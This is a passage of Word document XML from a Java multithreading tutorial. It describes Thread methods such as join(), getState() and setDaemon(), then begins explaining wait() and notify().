          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> public int getPriority()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF4E9CE" w14:textId="77777777" w:rsidR="00143A72" w:rsidRPr="00414276" w:rsidRDefault="00143A72" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="122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Usage:</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> int priority = thread.getPriority();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57BA4F83" w14:textId="77777777" w:rsidR="00143A72" w:rsidRPr="00414276" w:rsidRDefault="00143A72"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12. join()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21893FF7" w14:textId="77777777" w:rsidR="00143A72" w:rsidRPr="00414276" w:rsidRDefault="00143A72" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1224"/>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escription:</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Causes the current thread to wait until the thread on which join() was called has finished execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2967A55F" w14:textId="77777777" w:rsidR="00143A72" w:rsidRPr="00414276" w:rsidRDefault="00143A72" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1224"/>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tax:</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> public final void join() throws InterruptedException</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="084001A9" w14:textId="77777777" w:rsidR="00143A72" w:rsidRPr="00414276" w:rsidRDefault="00143A72" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1224"/>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Usage:</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> thread.join();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A8C6333" w14:textId="77777777" w:rsidR="00143A72" w:rsidRPr="00414276" w:rsidRDefault="00143A72" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1224"/>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Variants:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C654DA" w14:textId="77777777" w:rsidR="00143A72" w:rsidRPr="00414276" w:rsidRDefault="00143A72" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1224"/>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public final void join(long millis) throws InterruptedException</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B1E0F2" w14:textId="77777777" w:rsidR="00143A72" w:rsidRPr="00414276" w:rsidRDefault="00143A72" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1224"/>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public final void join(long millis, int nanos) throws InterruptedException</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="300F9522" w14:textId="77777777" w:rsidR="00143A72" w:rsidRPr="00414276" w:rsidRDefault="00143A72"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13. currentThread()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D8FE6F" w14:textId="77777777" w:rsidR="00143A72" w:rsidRPr="00414276" w:rsidRDefault="00143A72" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1225"/>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escription:</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Returns a reference to the currently executing thread.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA5D44B" w14:textId="77777777" w:rsidR="00143A72" w:rsidRPr="00414276" w:rsidRDefault="00143A72" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1225"/>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tax:</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> public static Thread currentThread()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17CE37A3" w14:textId="77777777" w:rsidR="00143A72" w:rsidRPr="00414276" w:rsidRDefault="00143A72" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1225"/>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Usage:</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Thread current = Thread.currentThread();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D391B64" w14:textId="77777777" w:rsidR="00143A72" w:rsidRPr="00414276" w:rsidRDefault="00143A72"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14. getState()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72DCA77D" w14:textId="77777777" w:rsidR="00143A72" w:rsidRPr="00414276" w:rsidRDefault="00143A72" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="122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escription:</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Returns the state of the thread. The thread can be in one of the following states:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16125049" w14:textId="77777777" w:rsidR="00143A72" w:rsidRPr="00414276" w:rsidRDefault="00143A72" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="122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NEW</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="579ECD52" w14:textId="77777777" w:rsidR="00143A72" w:rsidRPr="00414276" w:rsidRDefault="00143A72" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="122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RUNNABLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0237A39A" w14:textId="77777777" w:rsidR="00143A72" w:rsidRPr="00414276" w:rsidRDefault="00143A72" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="122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BLOCKED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B8BF222" w14:textId="77777777" w:rsidR="00143A72" w:rsidRPr="00414276" w:rsidRDefault="00143A72" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="122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WAITING</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D4DC1E" w14:textId="77777777" w:rsidR="00143A72" w:rsidRPr="00414276" w:rsidRDefault="00143A72" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="122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IMED_WAITING</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B0D4C9B" w14:textId="77777777" w:rsidR="00143A72" w:rsidRPr="00414276" w:rsidRDefault="00143A72" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="122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ERMINATED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3840AAC1" w14:textId="77777777" w:rsidR="00143A72" w:rsidRPr="00414276" w:rsidRDefault="00143A72" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="122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tax:</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> public Thread.State getState()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E37CCA" w14:textId="77777777" w:rsidR="00143A72" w:rsidRPr="00414276" w:rsidRDefault="00143A72" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="122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Usage:</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Thread.State state = thread.getState();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69372094" w14:textId="77777777" w:rsidR="00143A72" w:rsidRPr="00414276" w:rsidRDefault="00143A72"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15. setDaemon(boolean on)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E9CDBF" w14:textId="77777777" w:rsidR="00143A72" w:rsidRPr="00414276" w:rsidRDefault="00143A72" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1227"/>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escription:</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Marks the thread as a daemon thread or not. Daemon threads are background threads that terminate when all user threads have finished.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E86D527" w14:textId="77777777" w:rsidR="00143A72" w:rsidRPr="00414276" w:rsidRDefault="00143A72" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1227"/>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tax:</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> public void setDaemon(boolean on)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75AC1EEC" w14:textId="77777777" w:rsidR="00143A72" w:rsidRPr="00414276" w:rsidRDefault="00143A72" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1227"/>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Usage:</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> thread.setDaemon(true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="672B27D6" w14:textId="77777777" w:rsidR="00143A72" w:rsidRPr="00414276" w:rsidRDefault="00143A72"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16. isDaemon()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA4305A" w14:textId="77777777" w:rsidR="00143A72" w:rsidRPr="00414276" w:rsidRDefault="00143A72" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1228"/>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escription:</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Returns true if the thread is a daemon thread, false otherwise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EDFF751" w14:textId="77777777" w:rsidR="00143A72" w:rsidRPr="00414276" w:rsidRDefault="00143A72" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1228"/>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tax:</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> public boolean isDaemon()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="111F9367" w14:textId="77777777" w:rsidR="00143A72" w:rsidRPr="00414276" w:rsidRDefault="00143A72" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1228"/>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Usage:</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> boolean isDaemon = thread.isDaemon();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03669A02" w14:textId="77777777" w:rsidR="00143A72" w:rsidRPr="00414276" w:rsidRDefault="00143A72"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17. activeCount()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122EEC10" w14:textId="77777777" w:rsidR="00143A72" w:rsidRPr="00414276" w:rsidRDefault="00143A72" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1229"/>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escription:</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Returns the number of active threads in the current thread's thread group.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D22D12B" w14:textId="77777777" w:rsidR="00143A72" w:rsidRPr="00414276" w:rsidRDefault="00143A72" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1229"/>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tax:</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> public static int activeCount()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BBF30AB" w14:textId="77777777" w:rsidR="00143A72" w:rsidRPr="00414276" w:rsidRDefault="00143A72" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1229"/>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Usage:</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> int activeThreads = Thread.activeCount();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60BAE5FD" w14:textId="77777777" w:rsidR="00143A72" w:rsidRPr="00414276" w:rsidRDefault="00143A72"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18. getContextClassLoader()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D15FAE4" w14:textId="77777777" w:rsidR="00143A72" w:rsidRPr="00414276" w:rsidRDefault="00143A72" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1230"/>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escription:</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Returns the context ClassLoader for the thread.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F46F0D1" w14:textId="77777777" w:rsidR="00143A72" w:rsidRPr="00414276" w:rsidRDefault="00143A72" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1230"/>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tax:</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> public ClassLoader getContextClassLoader()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9162A8" w14:textId="77777777" w:rsidR="00143A72" w:rsidRPr="00414276" w:rsidRDefault="00143A72" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1230"/>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Usage:</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ClassLoader classLoader = thread.getContextClassLoader();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3782B3FA" w14:textId="77777777" w:rsidR="00143A72" w:rsidRPr="00414276" w:rsidRDefault="00143A72"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19. setContextClassLoader(ClassLoader cl)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3F5BDB" w14:textId="77777777" w:rsidR="00143A72" w:rsidRPr="00414276" w:rsidRDefault="00143A72" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1231"/>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escription:</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Sets the context ClassLoader for the thread.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B3B8D4" w14:textId="77777777" w:rsidR="00143A72" w:rsidRPr="00414276" w:rsidRDefault="00143A72" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1231"/>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lastRenderedPageBreak/>
        <w:t>Syntax:</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> public void setContextClassLoader(ClassLoader cl)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC64F72" w14:textId="77777777" w:rsidR="00143A72" w:rsidRPr="00414276" w:rsidRDefault="00143A72" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1231"/>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Usage:</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> thread.setContextClassLoader(newClassLoader);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E28542" w14:textId="77777777" w:rsidR="00143A72" w:rsidRPr="00414276" w:rsidRDefault="00143A72"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20. destroy() (Deprecated)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511EFB55" w14:textId="77777777" w:rsidR="00143A72" w:rsidRPr="00414276" w:rsidRDefault="00143A72" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1232"/>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escription:</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> This method was used to destroy a thread. It is deprecated in Java, and it’s better to let threads die naturally.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9CDB39" w14:textId="77777777" w:rsidR="00143A72" w:rsidRPr="00414276" w:rsidRDefault="00143A72" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1232"/>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tax:</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> public void destroy()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1892F067" w14:textId="77777777" w:rsidR="00143A72" w:rsidRPr="00414276" w:rsidRDefault="00143A72" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1232"/>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Usage:</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> This method should not be used anymore as it's deprecated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="581D58F6" w14:textId="77777777" w:rsidR="00143A72" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00143A7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5358C76">
          <v:rect id="_x0000_i1857" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB93E26" w14:textId="77777777" w:rsidR="001418BD" w:rsidRPr="00CE4B95" w:rsidRDefault="001418BD">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="288" w:name="_Toc196307768"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How do notify methods work in multithreading?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="288"/>
    </w:p>
    <w:p w14:paraId="1007FD86" w14:textId="6C87101A" w:rsidR="00326C8F" w:rsidRPr="00414276" w:rsidRDefault="00326C8F" w:rsidP="00414276">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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e notify() and notifyAll() methods are used in Java multithreading to communicate between threads, specifically to wake up threads that are in a waiting state. These methods are part of the Object class, and they work in conjunction with the wait() method to implement thread synchronization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D95C457"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Here's how they work:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1599FC19" w14:textId="77777777" w:rsidR="00326C8F" w:rsidRPr="00414276" w:rsidRDefault="00326C8F"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1. wait() Method:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F69114A" w14:textId="77777777" w:rsidR="00326C8F" w:rsidRPr="00414276" w:rsidRDefault="00326C8F" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="123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e wait() method is used to make the current thread release the monitor (lock) and enter the waiting state. A thread can be in the waiting state for two reasons:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC9254B" w14:textId="77777777" w:rsidR="00326C8F" w:rsidRPr="00414276" w:rsidRDefault="00326C8F" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="123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It is explicitly waiting for some condition to be met.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA866D2" w14:textId="77777777" w:rsidR="00326C8F" w:rsidRPr="00414276" w:rsidRDefault="00326C8F" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="123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It is waiting for some other thread to notify it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="267D3F16" w14:textId="77777777" w:rsidR="00326C8F" w:rsidRPr="00414276" w:rsidRDefault="00326C8F" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="123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e wait() method can be used with a timeout (e.g., wait(long timeout)), which allows a thread to wait for a specified period before it wakes up.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE9FCB2"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="048FFA01"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synchronized (sharedObject) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2276BAD4"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sharedObject.wait(); // Thread waits here until notified</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FEA0EEA"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="114AEDD1" w14:textId="77777777" w:rsidR="00326C8F" w:rsidRPr="00414276" w:rsidRDefault="00326C8F"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2. notify() Method:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0292375B" w14:textId="77777777" w:rsidR="00326C8F" w:rsidRPr="00414276" w:rsidRDefault="00326C8F" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1234"/>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The notify() method wakes up </w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>one</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
